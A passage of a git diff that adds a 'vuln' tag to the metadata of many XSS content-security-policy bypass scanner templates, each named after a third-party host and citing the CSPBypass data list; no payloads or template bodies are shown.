https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,liveperson-lptag + tags: xss,csp-bypass,liveperson-lptag,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/lpsnmedia-accdn-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/lpsnmedia-accdn-csp-bypass.yaml index a1b03a37998..3a79e340072 100644 --- a/dast/vulnerabilities/xss/csp-bypass/lpsnmedia-accdn-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/lpsnmedia-accdn-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,lpsnmedia-accdn + tags: xss,csp-bypass,lpsnmedia-accdn,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/mailru-connect-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/mailru-connect-csp-bypass.yaml index 86fda5bb977..b9e8055dd7e 100644 --- a/dast/vulnerabilities/xss/csp-bypass/mailru-connect-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/mailru-connect-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,mailru-connect + tags: xss,csp-bypass,mailru-connect,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/marketo-app-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/marketo-app-csp-bypass.yaml index 9f4100b72ed..8d7ef9f8cce 100644 --- a/dast/vulnerabilities/xss/csp-bypass/marketo-app-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/marketo-app-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,marketo-app + tags: xss,csp-bypass,marketo-app,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/matomo-demo-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/matomo-demo-csp-bypass.yaml index 3c887f6144f..c92acb547b6 100644 --- a/dast/vulnerabilities/xss/csp-bypass/matomo-demo-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/matomo-demo-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,matomo-demo + tags: xss,csp-bypass,matomo-demo,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/meteoprog-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/meteoprog-csp-bypass.yaml index 839a4be365d..ce994633de8 100644 --- a/dast/vulnerabilities/xss/csp-bypass/meteoprog-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/meteoprog-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,meteoprog + tags: xss,csp-bypass,meteoprog,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/mi-huodong-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/mi-huodong-csp-bypass.yaml index 447811ad68a..111db596b34 100644 --- a/dast/vulnerabilities/xss/csp-bypass/mi-huodong-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/mi-huodong-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,mi-huodong + tags: xss,csp-bypass,mi-huodong,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/microsoft-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/microsoft-api-csp-bypass.yaml index 309f2086846..31d563d1f94 100644 --- a/dast/vulnerabilities/xss/csp-bypass/microsoft-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/microsoft-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,microsoft-api + tags: xss,csp-bypass,microsoft-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/mixpanel-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/mixpanel-api-csp-bypass.yaml index 0bce89b82f6..978ec29fa4a 100644 --- a/dast/vulnerabilities/xss/csp-bypass/mixpanel-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/mixpanel-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,mixpanel-api + tags: xss,csp-bypass,mixpanel-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/naver-global-apis-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/naver-global-apis-csp-bypass.yaml index e9f947420a5..252dc6101ef 100644 --- a/dast/vulnerabilities/xss/csp-bypass/naver-global-apis-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/naver-global-apis-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,naver-global-apis + tags: xss,csp-bypass,naver-global-apis,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/naver-like-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/naver-like-csp-bypass.yaml index cfde67a97b8..d63a57a6489 100644 --- a/dast/vulnerabilities/xss/csp-bypass/naver-like-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/naver-like-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,naver-like + tags: xss,csp-bypass,naver-like,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/olark-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/olark-api-csp-bypass.yaml index 9ed5adc84ad..96473646733 100644 --- a/dast/vulnerabilities/xss/csp-bypass/olark-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/olark-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,olark-api + tags: xss,csp-bypass,olark-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/onetrust-geolocation-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/onetrust-geolocation-csp-bypass.yaml index 42911d96495..eb4e1e33fe6 100644 --- a/dast/vulnerabilities/xss/csp-bypass/onetrust-geolocation-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/onetrust-geolocation-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,onetrust-geolocation + tags: xss,csp-bypass,onetrust-geolocation,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/opendatasoft-docs-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/opendatasoft-docs-csp-bypass.yaml index d78a7d15f6b..e0a0ec51958 100644 --- a/dast/vulnerabilities/xss/csp-bypass/opendatasoft-docs-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/opendatasoft-docs-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,opendatasoft-docs + tags: xss,csp-bypass,opendatasoft-docs,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/openexchangerates-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/openexchangerates-csp-bypass.yaml index 3eebc6af365..69f7d7d8bd9 100644 --- a/dast/vulnerabilities/xss/csp-bypass/openexchangerates-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/openexchangerates-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,openexchangerates + tags: xss,csp-bypass,openexchangerates,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/openstreetmap-nominatim-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/openstreetmap-nominatim-csp-bypass.yaml index 67e3759d04d..b42f80866b7 100644 --- a/dast/vulnerabilities/xss/csp-bypass/openstreetmap-nominatim-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/openstreetmap-nominatim-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,openstreetmap-nominatim + tags: xss,csp-bypass,openstreetmap-nominatim,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/parastorage-static-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/parastorage-static-csp-bypass.yaml index 5880f5d0a3e..b4a9a7a52d9 100644 --- a/dast/vulnerabilities/xss/csp-bypass/parastorage-static-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/parastorage-static-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,parastorage-static + tags: xss,csp-bypass,parastorage-static,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/paypal-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/paypal-api-csp-bypass.yaml index 809d10e42b7..f3a9bf5729a 100644 --- a/dast/vulnerabilities/xss/csp-bypass/paypal-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/paypal-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,paypal-api + tags: xss,csp-bypass,paypal-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/pbs-urs-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/pbs-urs-csp-bypass.yaml index ff02da6d7a5..3793ea67f10 100644 --- a/dast/vulnerabilities/xss/csp-bypass/pbs-urs-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/pbs-urs-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,pbs-urs + tags: xss,csp-bypass,pbs-urs,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/pinterest-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/pinterest-api-csp-bypass.yaml index ac465d29ef0..cd396441917 100644 --- a/dast/vulnerabilities/xss/csp-bypass/pinterest-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/pinterest-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,pinterest-api + tags: xss,csp-bypass,pinterest-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/pinterest-widgets-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/pinterest-widgets-csp-bypass.yaml index ef9ec5e54a4..ddf7e5c6a21 100644 --- a/dast/vulnerabilities/xss/csp-bypass/pinterest-widgets-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/pinterest-widgets-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,pinterest-widgets + tags: xss,csp-bypass,pinterest-widgets,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/pixplug-visitor-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/pixplug-visitor-csp-bypass.yaml index 48c4b10a60a..14732f46f09 100644 --- a/dast/vulnerabilities/xss/csp-bypass/pixplug-visitor-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/pixplug-visitor-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,pixplug-visitor + tags: xss,csp-bypass,pixplug-visitor,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/qq-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/qq-csp-bypass.yaml index ce38ba5016b..051178b4460 100644 --- a/dast/vulnerabilities/xss/csp-bypass/qq-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/qq-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,qq + tags: xss,csp-bypass,qq,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/quantserve-pixel-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/quantserve-pixel-csp-bypass.yaml index d204328a634..0f99eaff4c3 100644 --- a/dast/vulnerabilities/xss/csp-bypass/quantserve-pixel-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/quantserve-pixel-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,quantserve-pixel + tags: xss,csp-bypass,quantserve-pixel,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/quantserve-secure-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/quantserve-secure-csp-bypass.yaml index 0c3341b1d17..3207d7f1d77 100644 --- a/dast/vulnerabilities/xss/csp-bypass/quantserve-secure-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/quantserve-secure-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,quantserve-secure + tags: xss,csp-bypass,quantserve-secure,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/quantserve-segapi-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/quantserve-segapi-csp-bypass.yaml index b5c3087d1f5..8eca4cf43a0 100644 --- a/dast/vulnerabilities/xss/csp-bypass/quantserve-segapi-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/quantserve-segapi-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,quantserve-segapi + tags: xss,csp-bypass,quantserve-segapi,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/recaptcha-net-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/recaptcha-net-csp-bypass.yaml index 1d692affd18..d3461ba105c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/recaptcha-net-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/recaptcha-net-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,recaptcha-net + tags: xss,csp-bypass,recaptcha-net,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/reddit-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/reddit-api-csp-bypass.yaml index e65ebeec339..c36ad7506fc 100644 --- a/dast/vulnerabilities/xss/csp-bypass/reddit-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/reddit-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,reddit-api + tags: xss,csp-bypass,reddit-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ring-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ring-csp-bypass.yaml index d180fde477f..f1c20bdea8f 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ring-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ring-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ring + tags: xss,csp-bypass,ring,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml index 4629db8900d..fa11f9f097a 100644 --- a/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,salesforce-api + tags: xss,csp-bypass,salesforce-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/samsung-shop-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/samsung-shop-csp-bypass.yaml index 2280fd6d013..33880ea45c7 100644 --- a/dast/vulnerabilities/xss/csp-bypass/samsung-shop-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/samsung-shop-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,samsung-shop + tags: xss,csp-bypass,samsung-shop,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/servicenow-kbcprod-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/servicenow-kbcprod-csp-bypass.yaml index a4ee5bf28b3..64792fc6579 100644 --- a/dast/vulnerabilities/xss/csp-bypass/servicenow-kbcprod-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/servicenow-kbcprod-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,servicenow-kbcprod + tags: xss,csp-bypass,servicenow-kbcprod,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/shopify-cdn-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/shopify-cdn-csp-bypass.yaml index 7b8ef3321c5..306a227d87d 100644 --- a/dast/vulnerabilities/xss/csp-bypass/shopify-cdn-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/shopify-cdn-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,shopify-cdn + tags: xss,csp-bypass,shopify-cdn,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/skimresources-r-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/skimresources-r-csp-bypass.yaml index 28823383d7a..97d2e8875e6 100644 --- a/dast/vulnerabilities/xss/csp-bypass/skimresources-r-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/skimresources-r-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,skimresources-r + tags: xss,csp-bypass,skimresources-r,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/skype-config-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/skype-config-csp-bypass.yaml index 158ee9d9720..dbd9125e9dd 100644 --- a/dast/vulnerabilities/xss/csp-bypass/skype-config-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/skype-config-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,skype-config + tags: xss,csp-bypass,skype-config,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/snyk-go-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/snyk-go-csp-bypass.yaml index a0189c13392..68cced878ef 100644 --- a/dast/vulnerabilities/xss/csp-bypass/snyk-go-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/snyk-go-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,snyk-go + tags: xss,csp-bypass,snyk-go,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/soundcloud-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/soundcloud-csp-bypass.yaml index f66601972a0..1ee48eb5c75 100644 --- a/dast/vulnerabilities/xss/csp-bypass/soundcloud-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/soundcloud-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,soundcloud + tags: xss,csp-bypass,soundcloud,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/st-angular-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/st-angular-csp-bypass.yaml index 31abfc1646f..3e27d2af26a 100644 --- a/dast/vulnerabilities/xss/csp-bypass/st-angular-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/st-angular-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,st-angular + tags: xss,csp-bypass,st-angular,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/stackexchange-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/stackexchange-api-csp-bypass.yaml index 6b81ae81500..8223535dcad 100644 --- a/dast/vulnerabilities/xss/csp-bypass/stackexchange-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/stackexchange-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,stackexchange-api + tags: xss,csp-bypass,stackexchange-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/swiftype-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/swiftype-api-csp-bypass.yaml index 4c461e3cb67..22bee7255ff 100644 --- a/dast/vulnerabilities/xss/csp-bypass/swiftype-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/swiftype-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,swiftype-api + tags: xss,csp-bypass,swiftype-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/syncfusion-cdn-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/syncfusion-cdn-csp-bypass.yaml index 0c89988ffda..f1ae7f67c4b 100644 --- a/dast/vulnerabilities/xss/csp-bypass/syncfusion-cdn-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/syncfusion-cdn-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,syncfusion-cdn + tags: xss,csp-bypass,syncfusion-cdn,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/taobao-suggest-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/taobao-suggest-csp-bypass.yaml index a6450646a98..38a39be0254 100644 --- a/dast/vulnerabilities/xss/csp-bypass/taobao-suggest-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/taobao-suggest-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,taobao-suggest + tags: xss,csp-bypass,taobao-suggest,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/tealiumiq-visitor-service-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/tealiumiq-visitor-service-csp-bypass.yaml index bfdefb4f606..bb17e3994c6 100644 --- a/dast/vulnerabilities/xss/csp-bypass/tealiumiq-visitor-service-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/tealiumiq-visitor-service-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,tealiumiq-visitor-service + tags: xss,csp-bypass,tealiumiq-visitor-service,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/tiktok-analytics-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/tiktok-analytics-csp-bypass.yaml index b0004627942..b64b6397229 100644 --- a/dast/vulnerabilities/xss/csp-bypass/tiktok-analytics-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/tiktok-analytics-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,tiktok-analytics + tags: xss,csp-bypass,tiktok-analytics,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/tumblr-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/tumblr-api-csp-bypass.yaml index 9e89cbe8f82..2ec22f53bc3 100644 --- a/dast/vulnerabilities/xss/csp-bypass/tumblr-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/tumblr-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,tumblr-api + tags: xss,csp-bypass,tumblr-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/twitter-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/twitter-api-csp-bypass.yaml index e9f618f515b..38212554719 100644 --- a/dast/vulnerabilities/xss/csp-bypass/twitter-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/twitter-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,twitter-api + tags: xss,csp-bypass,twitter-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/typekit-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/typekit-csp-bypass.yaml index 5940e8d15a5..c777545d9f1 100644 --- a/dast/vulnerabilities/xss/csp-bypass/typekit-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/typekit-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,typekit + tags: xss,csp-bypass,typekit,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ulogin-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ulogin-csp-bypass.yaml index caf4ef18d38..4c02ed68550 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ulogin-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ulogin-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ulogin + tags: xss,csp-bypass,ulogin,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/unpkg-angular-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/unpkg-angular-csp-bypass.yaml index ef6e9ef673f..624eeef2572 100644 --- a/dast/vulnerabilities/xss/csp-bypass/unpkg-angular-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/unpkg-angular-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,unpkg-angular + tags: xss,csp-bypass,unpkg-angular,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/unpkg-hyperscript-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/unpkg-hyperscript-csp-bypass.yaml index 391e88a31de..b32055c7ee1 100644 --- a/dast/vulnerabilities/xss/csp-bypass/unpkg-hyperscript-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/unpkg-hyperscript-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: 